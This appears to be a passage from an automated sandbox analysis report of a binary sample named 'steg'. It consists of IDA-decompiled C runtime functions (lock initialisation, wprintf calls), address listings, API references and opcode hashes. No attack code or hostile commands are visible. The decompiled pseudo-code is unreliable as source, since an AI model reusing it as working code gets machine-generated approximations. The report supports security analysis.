															_t241 = E00FE8487( &_v2076, 0x471020);
															_t396 = _t395 + 8;
															__eflags = _t241;
															if(__eflags != 0) {
																_t359 = 1;
															}
															goto L61;
														}
														goto L80;
														L61:
														_push(_v2080);
														_push(0x400);
														_push( &_v2076);
														_t237 = E00FE9087(_t282, _t344, _t359, __eflags);
														_t393 = _t396 + 0xc;
														__eflags = _t237;
													} while (__eflags != 0);
													_push(_v2080);
													E00FE9010(_t282, _t344, _t359, __eflags);
													_pop(_t350);
													_pop(_t376);
													__eflags = _v16 ^ _t381;
													return E00FE72F2(_t344, _t282, _v16 ^ _t381, _t324, _t350, _t376);
												}
											}
										}
									} else {
										 *0x470124();
										L52:
										_pop(_t345);
										_pop(_t360);
										__eflags = _v16 ^ _t381;
										return E00FE72F2(0, _t282, _v16 ^ _t381, _t324, _t345, _t360);
									}
								} else {
									 *((char*)(_t380 + _t126 - 0x108)) = 0;
									goto L37;
								}
							}
						}
					}
				}
				L80:
			}






























































































































































                                                                                                                    0x00f8f397
                                                                                                                    0x00f8f39b
                                                                                                                    0x00f8f3a0
                                                                                                                    0x00f8f3a8
                                                                                                                    0x00f8f3b2
                                                                                                                    0x00f8f3b8
                                                                                                                    0x00f8f3c1
                                                                                                                    0x00f8f3c3
                                                                                                                    0x00f8f3c3
                                                                                                                    0x00f8f3c8
                                                                                                                    0x00f8f3cd
                                                                                                                    0x00f8f3d0
                                                                                                                    0x00f8f3d3
                                                                                                                    0x00f8f465
                                                                                                                    0x00f8f468
                                                                                                                    0x00000000
                                                                                                                    0x00f8f46e
                                                                                                                    0x00f8f46e
                                                                                                                    0x00f8f471
                                                                                                                    0x00f8f492
                                                                                                                    0x00f8f49a
                                                                                                                    0x00f8f49c
                                                                                                                    0x00f8f4f1
                                                                                                                    0x00f8f49e
                                                                                                                    0x00f8f4ad
                                                                                                                    0x00f8f4b2
                                                                                                                    0x00f8f4bb
                                                                                                                    0x00f8f4be
                                                                                                                    0x00f8f4be
                                                                                                                    0x00f8f4c0
                                                                                                                    0x00f8f4c1
                                                                                                                    0x00f8f4c1
                                                                                                                    0x00f8f4c7
                                                                                                                    0x00f8f4ca
                                                                                                                    0x00f8f4e7
                                                                                                                    0x00f8f4cc
                                                                                                                    0x00f8f4cc
                                                                                                                    0x00f8f4d1
                                                                                                                    0x00f8f4d6
                                                                                                                    0x00f8f4db
                                                                                                                    0x00f8f4ca
                                                                                                                    0x00f8f4f8
                                                                                                                    0x00f8f4ff
                                                                                                                    0x00f8f508
                                                                                                                    0x00f8f509
                                                                                                                    0x00f8f50c
                                                                                                                    0x00f8f50e
                                                                                                                    0x00f8f517
                                                                                                                    0x00f8f473
                                                                                                                    0x00f8f473
                                                                                                                    0x00f8f478
                                                                                                                    0x00f8f47d
                                                                                                                    0x00f8f482
                                                                                                                    0x00000000
                                                                                                                    0x00f8f482
                                                                                                                    0x00f8f471
                                                                                                                    0x00f8f3d9
                                                                                                                    0x00f8f3d9
                                                                                                                    0x00f8f3e0
                                                                                                                    0x00f8f3e2
                                                                                                                    0x00f8f3eb
                                                                                                                    0x00f8f406
                                                                                                                    0x00f8f410
                                                                                                                    0x00f8f418
                                                                                                                    0x00f8f41f
                                                                                                                    0x00f8f424
                                                                                                                    0x00f8f430
                                                                                                                    0x00f8f435
                                                                                                                    0x00f8f43a
                                                                                                                    0x00f8f43f
                                                                                                                    0x00f8f452
                                                                                                                    0x00f8f458
                                                                                                                    0x00f8f45a
                                                                                                                    0x00f8f51a
                                                                                                                    0x00f8f51f
                                                                                                                    0x00f8f521
                                                                                                                    0x00f8f526
                                                                                                                    0x00f8f52b
                                                                                                                    0x00f8f530
                                                                                                                    0x00f8f535
                                                                                                                    0x00f8f538
                                                                                                                    0x00f8f538
                                                                                                                    0x00f8f53f
                                                                                                                    0x00f8f541
                                                                                                                    0x00f8f546
                                                                                                                    0x00f8f54a
                                                                                                                    0x00f8f54f
                                                                                                                    0x00f8f54f
                                                                                                                    0x00f8f554
                                                                                                                    0x00f8f556
                                                                                                                    0x00f8f558
                                                                                                                    0x00f8f55d
                                                                                                                    0x00f8f565
                                                                                                                    0x00f8f56a
                                                                                                                    0x00f8f56b
                                                                                                                    0x00f8f56c
                                                                                                                    0x00f8f56d
                                                                                                                    0x00f8f56e
                                                                                                                    0x00f8f56f
                                                                                                                    0x00f8f570
                                                                                                                    0x00f8f571
                                                                                                                    0x00f8f572
                                                                                                                    0x00f8f573
                                                                                                                    0x00f8f574
                                                                                                                    0x00f8f575
                                                                                                                    0x00f8f576
                                                                                                                    0x00f8f577
                                                                                                                    0x00f8f578
                                                                                                                    0x00f8f587
                                                                                                                    0x00f8f598
                                                                                                                    0x00f8f59f
                                                                                                                    0x00f8f5a4
                                                                                                                    0x00f8f5ab
                                                                                                                    0x00f8f5b5
                                                                                                                    0x00f8f5bb
                                                                                                                    0x00f8f5c4
                                                                                                                    0x00f8f5bd
                                                                                                                    0x00f8f5bd
                                                                                                                    0x00f8f5bd
                                                                                                                    0x00f8f5c9
                                                                                                                    0x00f8f5ce
                                                                                                                    0x00f8f5cf
                                                                                                                    0x00f8f5d4
                                                                                                                    0x00f8f5dd
                                                                                                                    0x00f8f5de
                                                                                                                    0x00f8f5e3
                                                                                                                    0x00f8f5eb
                                                                                                                    0x00f8f5ec
                                                                                                                    0x00f8f5f9
                                                                                                                    0x00f8f712
                                                                                                                    0x00f8f717
                                                                                                                    0x00f8f721
                                                                                                                    0x00f8f5ff
                                                                                                                    0x00f8f61e
                                                                                                                    0x00f8f626
                                                                                                                    0x00f8f70c
                                                                                                                    0x00000000
                                                                                                                    0x00f8f644
                                                                                                                    0x00f8f64c
                                                                                                                    0x00f8f659
                                                                                                                    0x00f8f65b
                                                                                                                    0x00f8f661
                                                                                                                    0x00f8f661
                                                                                                                    0x00f8f667
                                                                                                                    0x00f8f667
                                                                                                                    0x00f8f669
                                                                                                                    0x00f8f66a
                                                                                                                    0x00f8f670
                                                                                                                    0x00f8f673
                                                                                                                    0x00f8f675
                                                                                                                    0x00f8f681
                                                                                                                    0x00f8f681
                                                                                                                    0x00f8f681
                                                                                                                    0x00f8f681
                                                                                                                    0x00f8f673
                                                                                                                    0x00f8f683
                                                                                                                    0x00f8f689
                                                                                                                    0x00f8f689
                                                                                                                    0x00f8f68c
                                                                                                                    0x00f8f68c
                                                                                                                    0x00f8f68e
                                                                                                                    0x00f8f68f
                                                                                                                    0x00f8f695
                                                                                                                    0x00f8f695
                                                                                                                    0x00f8f69a
                                                                                                                    0x00f8f6ab
                                                                                                                    0x00f8f6ab
                                                                                                                    0x00f8f6b1
                                                                                                                    0x00f8f6b1
                                                                                                                    0x00f8f6b7
                                                                                                                    0x00f8f6b7
                                                                                                                    0x00f8f6b9
                                                                                                                    0x00f8f6ba
                                                                                                                    0x00f8f6c0
                                                                                                                    0x00f8f6c0
                                                                                                                    0x00f8f6c4
                                                                                                                    0x00f8f6c9
                                                                                                                    0x00f8f6d0
                                                                                                                    0x00f8f6db
                                                                                                                    0x00f8f6e0
                                                                                                                    0x00f8f6e3
                                                                                                                    0x00f8f6e6
                                                                                                                    0x00f8f6f4
                                                                                                                    0x00f8f69c
                                                                                                                    0x00f8f69c
                                                                                                                    0x00f8f6a6
                                                                                                                    0x00f8f6a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8f6a9
                                                                                                                    0x00f8f6f5
                                                                                                                    0x00f8f6fa
                                                                                                                    0x00f8f722
                                                                                                                    0x00f8f727
                                                                                                                    0x00f8f728
                                                                                                                    0x00f8f729
                                                                                                                    0x00f8f72a
                                                                                                                    0x00f8f72b
                                                                                                                    0x00f8f72c
                                                                                                                    0x00f8f72d
                                                                                                                    0x00f8f72e
                                                                                                                    0x00f8f72f
                                                                                                                    0x00f8f730
                                                                                                                    0x00f8f731
                                                                                                                    0x00f8f732
                                                                                                                    0x00f8f733
                                                                                                                    0x00f8f734
                                                                                                                    0x00f8f735
                                                                                                                    0x00f8f736
                                                                                                                    0x00f8f737
                                                                                                                    0x00f8f738
                                                                                                                    0x00f8f747
                                                                                                                    0x00f8f74a
                                                                                                                    0x00f8f74b
                                                                                                                    0x00f8f75a
                                                                                                                    0x00f8f761
                                                                                                                    0x00f8f766
                                                                                                                    0x00f8f769
                                                                                                                    0x00f8f76b
                                                                                                                    0x00f8f76d
                                                                                                                    0x00f8f771
                                                                                                                    0x00f8f777
                                                                                                                    0x00f8f780
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f78b
                                                                                                                    0x00f8f790
                                                                                                                    0x00f8f7a2
                                                                                                                    0x00f8f7a8
                                                                                                                    0x00f8f7aa
                                                                                                                    0x00f8f7d7
                                                                                                                    0x00f8f7ed
                                                                                                                    0x00f8f805
                                                                                                                    0x00f8f81b
                                                                                                                    0x00f8f833
                                                                                                                    0x00f8f839
                                                                                                                    0x00f8f83e
                                                                                                                    0x00f8f841
                                                                                                                    0x00f8f843
                                                                                                                    0x00000000
                                                                                                                    0x00f8f849
                                                                                                                    0x00f8f849
                                                                                                                    0x00f8f84f
                                                                                                                    0x00f8f851
                                                                                                                    0x00000000
                                                                                                                    0x00f8f857
                                                                                                                    0x00f8f857
                                                                                                                    0x00f8f85e
                                                                                                                    0x00f8f863
                                                                                                                    0x00f8f864
                                                                                                                    0x00f8f869
                                                                                                                    0x00f8f86c
                                                                                                                    0x00f8f86e
                                                                                                                    0x00f8f9e9
                                                                                                                    0x00f8f9e9
                                                                                                                    0x00f8f9ef
                                                                                                                    0x00f8f9fc
                                                                                                                    0x00f8f9fd
                                                                                                                    0x00f8f9ff
                                                                                                                    0x00f8fa08
                                                                                                                    0x00f8f877
                                                                                                                    0x00f8f877
                                                                                                                    0x00f8f883
                                                                                                                    0x00f8f888
                                                                                                                    0x00f8f891
                                                                                                                    0x00f8f893
                                                                                                                    0x00f8f8b4
                                                                                                                    0x00f8f8b9
                                                                                                                    0x00f8f8bc
                                                                                                                    0x00f8f8be
                                                                                                                    0x00f8f90a
                                                                                                                    0x00f8f90f
                                                                                                                    0x00f8f912
                                                                                                                    0x00f8f914
                                                                                                                    0x00f8f916
                                                                                                                    0x00f8f916
                                                                                                                    0x00f8f919
                                                                                                                    0x00f8f91f
                                                                                                                    0x00f8f927
                                                                                                                    0x00f8f927
                                                                                                                    0x00f8f929
                                                                                                                    0x00f8f92a
                                                                                                                    0x00f8f92a
                                                                                                                    0x00f8f930
                                                                                                                    0x00f8f931
                                                                                                                    0x00f8f937
                                                                                                                    0x00f8fa09
                                                                                                                    0x00f8fa0e
                                                                                                                    0x00f8fa0f
                                                                                                                    0x00f8fa10
                                                                                                                    0x00f8fa11
                                                                                                                    0x00f8fa12
                                                                                                                    0x00f8fa13
                                                                                                                    0x00f8fa14
                                                                                                                    0x00f8fa15
                                                                                                                    0x00f8fa16
                                                                                                                    0x00f8fa17
                                                                                                                    0x00f8fa1a
                                                                                                                    0x00f8fa1b
                                                                                                                    0x00f8fa1c
                                                                                                                    0x00f8fa21
                                                                                                                    0x00f8fa24
                                                                                                                    0x00f8fa2d
                                                                                                                    0x00f8fa32
                                                                                                                    0x00f8fa37
                                                                                                                    0x00f8fa40
                                                                                                                    0x00f8fa45
                                                                                                                    0x00f8fa4a
                                                                                                                    0x00f8fa53
                                                                                                                    0x00f8fa58
                                                                                                                    0x00f8fa5d
                                                                                                                    0x00f8fa69
                                                                                                                    0x00f8fa6e
                                                                                                                    0x00f8fa73
                                                                                                                    0x00f8fa7b
                                                                                                                    0x00f8fa85
                                                                                                                    0x00f8fa8d
                                                                                                                    0x00f8fa90
                                                                                                                    0x00f8fa9b
                                                                                                                    0x00f8faa6
                                                                                                                    0x00f8faab
                                                                                                                    0x00f8faae
                                                                                                                    0x00f8fab6
                                                                                                                    0x00f8fabb
                                                                                                                    0x00f8fabf
                                                                                                                    0x00f8fac8
                                                                                                                    0x00f8facd
                                                                                                                    0x00f8fad2
                                                                                                                    0x00f8fadb
                                                                                                                    0x00f8fae0
                                                                                                                    0x00f8fae5
                                                                                                                    0x00f8faf1
                                                                                                                    0x00f8faf6
                                                                                                                    0x00f8fafb
                                                                                                                    0x00f8fb04
                                                                                                                    0x00f8fb0c
                                                                                                                    0x00f8fb11
                                                                                                                    0x00f8fb11
                                                                                                                    0x00f8fb13
                                                                                                                    0x00f8fb15
                                                                                                                    0x00f8fb1b
                                                                                                                    0x00f8f93d
                                                                                                                    0x00f8f93d
                                                                                                                    0x00f8f93e
                                                                                                                    0x00f8f951
                                                                                                                    0x00f8f956
                                                                                                                    0x00f8f95c
                                                                                                                    0x00f8f95f
                                                                                                                    0x00f8f961
                                                                                                                    0x00f8f961
                                                                                                                    0x00f8f967
                                                                                                                    0x00f8f967
                                                                                                                    0x00f8f969
                                                                                                                    0x00f8f96a
                                                                                                                    0x00f8f96a
                                                                                                                    0x00f8f96e
                                                                                                                    0x00f8f96e
                                                                                                                    0x00f8f970
                                                                                                                    0x00f8f976
                                                                                                                    0x00f8f979
                                                                                                                    0x00f8f979
                                                                                                                    0x00f8f97b
                                                                                                                    0x00f8f97c
                                                                                                                    0x00f8f97c
                                                                                                                    0x00f8f980
                                                                                                                    0x00f8f980
                                                                                                                    0x00f8f982
                                                                                                                    0x00f8f984
                                                                                                                    0x00f8f984
                                                                                                                    0x00f8f987
                                                                                                                    0x00f8f987
                                                                                                                    0x00f8f989
                                                                                                                    0x00f8f98a
                                                                                                                    0x00f8f98a
                                                                                                                    0x00f8f98e
                                                                                                                    0x00f8f995
                                                                                                                    0x00f8f998
                                                                                                                    0x00f8f99d
                                                                                                                    0x00f8f99f
                                                                                                                    0x00f8f9a2
                                                                                                                    0x00f8f9a4
                                                                                                                    0x00f8f9af
                                                                                                                    0x00f8f9bb
                                                                                                                    0x00f8f9c9
                                                                                                                    0x00f8f9d5
                                                                                                                    0x00f8f9da
                                                                                                                    0x00f8f9e0
                                                                                                                    0x00f8f9e5
                                                                                                                    0x00f8f9e5
                                                                                                                    0x00f8f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00f8f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8f895
                                                                                                                    0x00f8f89b
                                                                                                                    0x00f8f8a0
                                                                                                                    0x00f8f8a3
                                                                                                                    0x00f8f8a5
                                                                                                                    0x00f8f8a7
                                                                                                                    0x00f8f8a7
                                                                                                                    0x00000000
                                                                                                                    0x00f8f8a5
                                                                                                                    0x00000000
                                                                                                                    0x00f8f8c0
                                                                                                                    0x00f8f8c0
                                                                                                                    0x00f8f8cc
                                                                                                                    0x00f8f8d1
                                                                                                                    0x00f8f8d2
                                                                                                                    0x00f8f8d7
                                                                                                                    0x00f8f8da
                                                                                                                    0x00f8f8da
                                                                                                                    0x00f8f8de
                                                                                                                    0x00f8f8e4
                                                                                                                    0x00f8f8ee
                                                                                                                    0x00f8f8ef
                                                                                                                    0x00f8f8f3
                                                                                                                    0x00f8f8fd
                                                                                                                    0x00f8f8fd
                                                                                                                    0x00f8f86e
                                                                                                                    0x00f8f851
                                                                                                                    0x00f8f7ac
                                                                                                                    0x00f8f7ac
                                                                                                                    0x00f8f7b2
                                                                                                                    0x00f8f7b2
                                                                                                                    0x00f8f7b5
                                                                                                                    0x00f8f7b9
                                                                                                                    0x00f8f7c3
                                                                                                                    0x00f8f7c3
                                                                                                                    0x00f8f6fc
                                                                                                                    0x00f8f6fc
                                                                                                                    0x00000000
                                                                                                                    0x00f8f6fc
                                                                                                                    0x00f8f6fa
                                                                                                                    0x00f8f69a
                                                                                                                    0x00f8f626
                                                                                                                    0x00f8f5f9
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • _wprintf.LIBCMT ref: 00F8F406
                                                                                                                    • _wprintf.LIBCMT ref: 00F8F410
                                                                                                                    • _wprintf.LIBCMT ref: 00F8F430
                                                                                                                    • _wprintf.LIBCMT ref: 00F8F526
                                                                                                                    • _wprintf.LIBCMT ref: 00F8F530
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F100
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F114
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F123
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F139
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F154
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F15E
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F168
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F177
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F181
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F190
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F19A
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F1A9
                                                                                                                      • Part of subcall function 00F8F0B7: _wprintf.LIBCMT ref: 00F8F1B3
                                                                                                                      • Part of subcall function 00F8EE77: vswprintf.LIBCMT ref: 00F8EE9A
                                                                                                                      • Part of subcall function 00F8EE77: _wprintf.LIBCMT ref: 00F8EEDB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf$vswprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3567883335-0
                                                                                                                    • Opcode ID: cc4837d878c03868926272d2bd919dc98e7aac5c93c474bb8730b9a8a55dd63a
                                                                                                                    • Instruction ID: 295918f6f3fe4c7e093f55e1ab65a07ce5e9edf203f83148fb2c64bd7729174c
                                                                                                                    • Opcode Fuzzy Hash: cc4837d878c03868926272d2bd919dc98e7aac5c93c474bb8730b9a8a55dd63a
                                                                                                                    • Instruction Fuzzy Hash: 05413B62D04245EADB2077F59C46FEE32189F11721F244636FA1DA10C3DA689908A776
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0107A643 Relevance: 7.6, APIs: 5, Instructions: 118COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E0107A643(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t51;
				signed int _t54;
				signed int _t62;
				signed int _t78;
				signed int _t84;
				signed int _t92;
				signed int _t94;
				void* _t99;
				void* _t100;

				_t100 = __eflags;
				_push(0x18);
				_push(0x481128);
				E010728FC(__ebx, __edi, __esi);
				_t94 = __esi | 0xffffffff;
				 *(_t99 - 0x1c) = _t94;
				 *(_t99 - 0x24) =  *(_t99 - 0x24) & 0x00000000;
				_push(0xb);
				_t51 = E010722F5(__ebx, __ecx, __edx, __edi, _t94, _t100);
				if(_t51 != 0) {
					E0107226D(0xb);
					 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
					_t78 = 0;
					__eflags = 0;
					while(1) {
						 *(_t99 - 0x28) = _t78;
						__eflags = _t78 - 0x40;
						if(_t78 >= 0x40) {
							break;
						}
						_t92 =  *(0x48b030 + _t78 * 4);
						__eflags = _t92;
						if(_t92 == 0) {
							_t84 = E0107252D(0x20, 0x40);
							 *(_t99 - 0x20) = _t84;
							__eflags = _t84;
							if(_t84 == 0) {
								break;
							}
							 *(0x48b030 + _t78 * 4) = _t84;
							 *0x48b36c =  *0x48b36c + 0x20;
							__eflags =  *0x48b36c;
							while(1) {
								__eflags = _t84 -  *(0x48b030 + _t78 * 4) + 0x800;
								if(__eflags >= 0) {
									break;
								}
								 *((short*)(_t84 + 4)) = 0xa00;
								 *_t84 =  *_t84 | 0xffffffff;
								 *(_t84 + 8) =  *(_t84 + 8) & 0x00000000;
								_t84 = _t84 + 0x40;
								 *(_t99 - 0x20) = _t84;
							}
							_t94 = _t78 << 5;
							 *(_t99 - 0x1c) = _t94;
							 *((char*)( *((intOrPtr*)(0x48b030 + (_t94 >> 5) * 4)) + ((_t94 & 0x0000001f) << 6) + 4)) = 1;
							_push(_t94);
							_t62 = E0107A5B7(_t78, _t92, _t94, __eflags);
							__eflags = _t62;
							if(_t62 == 0) {
								_t94 = _t94 | 0xffffffff;
								__eflags = _t94;
								 *(_t99 - 0x1c) = _t94;
							}
							break;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							 *(_t99 - 0x20) = _t92;
							__eflags = _t92 -  *(0x48b030 + _t78 * 4) + 0x800;
							if(_t92 >=  *(0x48b030 + _t78 * 4) + 0x800) {
								break;
							}
							__eflags =  *(_t92 + 4) & 0x00000001;
							if(( *(_t92 + 4) & 0x00000001) != 0) {
								L14:
								_t92 = _t92 + 0x40;
								continue;
							}
							__eflags =  *(_t92 + 8);
							if( *(_t92 + 8) == 0) {
								E0107226D(0xa);
								 *(_t99 - 4) = 1;
								__eflags =  *(_t92 + 8);
								if( *(_t92 + 8) == 0) {
									_t18 = _t92 + 0xc; // 0x8000000c
									 *0x4741bc(_t18, 0xfa0);
									_t19 = _t92 + 8;
									 *_t19 =  *(_t92 + 8) + 1;
									__eflags =  *_t19;
								}
								_t21 = _t99 - 4;
								 *_t21 =  *(_t99 - 4) & 0x00000000;
								__eflags =  *_t21;
								E0107A717();
							}
							__eflags =  *(_t99 - 0x24);
							if( *(_t99 - 0x24) == 0) {
								_t24 = _t92 + 0xc; // 0x8000000c
								 *0x47409c(_t24);
								__eflags =  *(_t92 + 4) & 0x00000001;
								if(( *(_t92 + 4) & 0x00000001) == 0) {
									__eflags =  *(_t99 - 0x24);
									if( *(_t99 - 0x24) != 0) {
										goto L14;
									}
									 *(_t92 + 4) = 1;
									 *_t92 =  *_t92 | 0xffffffff;
									_t94 = (_t92 -  *(0x48b030 + _t78 * 4) >> 6) + (_t78 << 5);
									__eflags = _t94;
									 *(_t99 - 0x1c) = _t94;
									break;
								}
								_t28 = _t92 + 0xc; // 0x8000000c
								 *0x4740a0(_t28);
							}
							goto L14;
						}
						__eflags = _t94 - 0xffffffff;
						if(_t94 != 0xffffffff) {
							break;
						}
						_t78 = _t78 + 1;
					}
					 *(_t99 - 4) = 0xfffffffe;
					E0107A7DF();
					_t54 = _t94;
					L26:
					return E01072941(_t54);
				}
				_t54 = _t51 | _t94;
				goto L26;
			}












                                                                                                                    0x0107a643
                                                                                                                    0x0107a643
                                                                                                                    0x0107a645
                                                                                                                    0x0107a64a
                                                                                                                    0x0107a64f
                                                                                                                    0x0107a652
                                                                                                                    0x0107a655
                                                                                                                    0x0107a659
                                                                                                                    0x0107a65b
                                                                                                                    0x0107a663
                                                                                                                    0x0107a66e
                                                                                                                    0x0107a674
                                                                                                                    0x0107a678
                                                                                                                    0x0107a678
                                                                                                                    0x0107a67a
                                                                                                                    0x0107a67a
                                                                                                                    0x0107a67d
                                                                                                                    0x0107a680
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0107a686
                                                                                                                    0x0107a68d
                                                                                                                    0x0107a68f
                                                                                                                    0x0107a75a
                                                                                                                    0x0107a75c
                                                                                                                    0x0107a75f
                                                                                                                    0x0107a761
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0107a763
                                                                                                                    0x0107a76a
                                                                                                                    0x0107a76a
                                                                                                                    0x0107a771
                                                                                                                    0x0107a77d
                                                                                                                    0x0107a77f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0107a781
                                                                                                                    0x0107a787
                                                                                                                    0x0107a78a
                                                                                                                    0x0107a78e
                                                                                                                    0x0107a791
                                                                                                                    0x0107a791
                                                                                                                    0x0107a798
                                                                                                                    0x0107a79b
                                                                                                                    0x0107a7b2
                                                                                                                    0x0107a7b7
                                                                                                                    0x0107a7b8
                                                                                                                    0x0107a7be
                                                                                                                    0x0107a7c0
                                                                                                                    0x0107a7c2
                                                                                                                    0x0107a7c2
                                                                                                                    0x0107a7c5
                                                                                                                    0x0107a7c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0107a695
                                                                                                                    0x0107a695
                                                                                                                    0x0107a695
                                                                                                                    0x0107a6a4
                                                                                                                    0x0107a6a6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0107a6ac
                                                                                                                    0x0107a6b0
                                                                                                                    0x0107a709
                                                                                                                    0x0107a709
                                                                                                                    0x00000000
                                                                                                                    0x0107a709
                                                                                                                    0x0107a6b2
                                                                                                                    0x0107a6b6
                                                                                                                    0x0107a6ba
                                                                                                                    0x0107a6c0
                                                                                                                    0x0107a6c7
                                                                                                                    0x0107a6cb
                                                                                                                    0x0107a6d2
                                                                                                                    0x0107a6d6
                                                                                                                    0x0107a6dc
                                                                                                                    0x0107a6dc
                                                                                                                    0x0107a6dc
                                                                                                                    0x0107a6dc
                                                                                                                    0x0107a6df
                                                                                                                    0x0107a6df
                                                                                                                    0x0107a6df
                                                                                                                    0x0107a6e3
                                                                                                                    0x0107a6e3
                                                                                                                    0x0107a6eb
                                                                                                                    0x0107a6ed
                                                                                                                    0x0107a6ef
                                                                                                                    0x0107a6f3
                                                                                                                    0x0107a6f9
                                                                                                                    0x0107a6fd
                                                                                                                    0x0107a723
                                                                                                                    0x0107a725
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0107a727
                                                                                                                    0x0107a72b
                                                                                                                    0x0107a73f
                                                                                                                    0x0107a73f
                                                                                                                    0x0107a741
                                                                                                                    0x00000000
                                                                                                                    0x0107a741
                                                                                                                    0x0107a6ff
                                                                                                                    0x0107a703
                                                                                                                    0x0107a703
                                                                                                                    0x00000000
                                                                                                                    0x0107a6ed
                                                                                                                    0x0107a744
                                                                                                                    0x0107a747
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0107a749
                                                                                                                    0x0107a749
                                                                                                                    0x0107a7c8
                                                                                                                    0x0107a7cf
                                                                                                                    0x0107a7d4
                                                                                                                    0x0107a7d6
                                                                                                                    0x0107a7db
                                                                                                                    0x0107a7db
                                                                                                                    0x0107a665
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __mtinitlocknum.LIBCMT ref: 0107A65B
                                                                                                                      • Part of subcall function 010722F5: __FF_MSGBANNER.LIBCMT ref: 0107230A
                                                                                                                      • Part of subcall function 010722F5: __NMSG_WRITE.LIBCMT ref: 01072311
                                                                                                                      • Part of subcall function 010722F5: __malloc_crt.LIBCMT ref: 01072331
                                                                                                                    • __lock.LIBCMT ref: 0107A66E
                                                                                                                    • __lock.LIBCMT ref: 0107A6BA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock$__malloc_crt__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1818312207-0
                                                                                                                    • Opcode ID: 984fdba79346da7c941f07d78ca38673703a021201ddbf3c0c4fbfb40fc46d8a
                                                                                                                    • Instruction ID: 8e3461f3db07d62f940ad8f171c792956ea5ddc2cf663be0754a0d5f542a812c
                                                                                                                    • Opcode Fuzzy Hash: 984fdba79346da7c941f07d78ca38673703a021201ddbf3c0c4fbfb40fc46d8a
                                                                                                                    • Instruction Fuzzy Hash: 63411F71E00206DBDB119FACDC4479DB7F0BB05325F28822DD5A6A72E1E7749800CB88
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FF5B33 Relevance: 7.6, APIs: 5, Instructions: 118COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E00FF5B33(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t51;
				signed int _t54;
				signed int _t62;
				signed int _t78;
				signed int _t84;
				signed int _t92;
				signed int _t94;
				void* _t99;
				void* _t100;

				_t100 = __eflags;
				_push(0x18);
				_push(0x47e060);
				E00FEEC57(__ebx, __edi, __esi);
				_t94 = __esi | 0xffffffff;
				 *(_t99 - 0x1c) = _t94;
				 *(_t99 - 0x24) =  *(_t99 - 0x24) & 0x00000000;
				_push(0xb);
				_t51 = E00FEE4D0(__ebx, __ecx, __edx, __edi, _t94, _t100);
				if(_t51 != 0) {
					E00FEE448(0xb);
					 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
					_t78 = 0;
					__eflags = 0;
					while(1) {
						 *(_t99 - 0x28) = _t78;
						__eflags = _t78 - 0x40;
						if(_t78 >= 0x40) {
							break;
						}
						_t92 =  *(0x487f50 + _t78 * 4);
						__eflags = _t92;
						if(_t92 == 0) {
